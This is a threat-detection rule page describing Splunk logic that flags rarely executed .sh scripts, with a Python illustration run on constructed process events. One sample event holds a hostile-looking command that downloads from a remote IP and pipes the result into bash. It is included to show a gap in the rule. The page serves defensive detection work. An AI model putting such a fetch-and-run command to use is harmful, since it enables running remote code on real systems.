
Rare shell script execution

Anvilogic Forge

Summary
This detection rule identifies rare executions of Unix shell scripts (.sh), which can indicate malicious activity. Because a shell script can wrap an arbitrary sequence of commands, the rule focuses on scripts that are invoked unusually rather than on script execution in general. The logic is written for Splunk and queries Unix process execution (syscall) logs for shell script launches, keeping only those whose command has been observed fewer than five times; such a low count is treated as a sign of potentially abnormal behavior. It matches on command names ending in .sh, a pattern associated with the threat actors referenced by the rule, including AbcBot and Sandworm. The rule is intended to strengthen defenses against scripting-based attack techniques by alerting on unusual script executions that may indicate reconnaissance or initial compromise. As with any rarity-based detection, newly deployed or infrequently run administrative scripts will also match, so alerts should be triaged against the executing user, host and script path.
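The following is an added illustration of the logic described above, not the Anvilogic rule itself or its Splunk query: it extracts the .sh script path from each process command line, counts how often each script has been executed, and reports those seen fewer than five times. The process events, hostnames, users and paths are constructed for the example. Note that a command such as curl piped into bash carries no .sh token and is not matched, and that a rarely run CI script is flagged alongside the suspicious one, which is the false-positive trade-off of a rarity threshold.

```python
import shlex
from collections import Counter
from typing import Optional

# Constructed process-execution events (not real telemetry): host, user, command line.
SAMPLE_EVENTS = (
    [{"host": "web01", "user": "deploy", "cmd": "/bin/bash /opt/app/deploy.sh --env prod"}] * 6
    + [{"host": "db02", "user": "postgres", "cmd": "sh /var/backups/rotate.sh"}] * 5
    + [{"host": "build01", "user": "jenkins", "cmd": "/usr/bin/env bash ./ci/run_tests.sh"}] * 2
    + [{"host": "web03", "user": "www-data", "cmd": "/bin/sh /tmp/.x/ldr.sh"}]
    # Piped-to-shell download: no .sh token, so the .sh filter does not see it.
    + [{"host": "web03", "user": "www-data", "cmd": "bash -c 'curl -s http://198.51.100.7/p | bash'"}]
)

# The page's threshold: a script executed fewer than five times is "rare".
RARE_THRESHOLD = 5


def script_path(cmd: str) -> Optional[str]:
    """Return the first shell-tokenised argument ending in .sh, or None."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        # Unbalanced quotes in the command line: fall back to a plain split.
        tokens = cmd.split()
    for tok in tokens:
        if tok.endswith(".sh"):
            return tok
    return None


def rare_scripts(events, threshold: int = RARE_THRESHOLD) -> dict:
    """Count .sh executions per script path and return those below the threshold.

    Each result carries the execution count and the first event that referenced
    the script, which is the context (host, user) an analyst needs for triage.
    """
    counts = Counter()
    first_seen = {}
    for ev in events:
        path = script_path(ev["cmd"])
        if path is None:
            continue
        counts[path] += 1
        first_seen.setdefault(path, ev)
    return {
        path: {"count": n, "first_event": first_seen[path]}
        for path, n in counts.items()
        if n < threshold
    }


if __name__ == "__main__":
    for path, info in sorted(rare_scripts(SAMPLE_EVENTS).items()):
        ev = info["first_event"]
        print(f"rare script {path}: {info['count']} execution(s), "
              f"first seen on {ev['host']} as {ev['user']}")
```

Running the block reports /tmp/.x/ldr.sh (one execution, as www-data) and ./ci/run_tests.sh (two executions, as jenkins); deploy.sh and rotate.sh are at or above the threshold and are suppressed, and the curl-to-bash line never enters the count.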
Categories
  • Linux
  • Endpoint
Data Sources
  • Process
  • File
ATT&CK Techniques
  • T1059.004
Created: 2024-02-09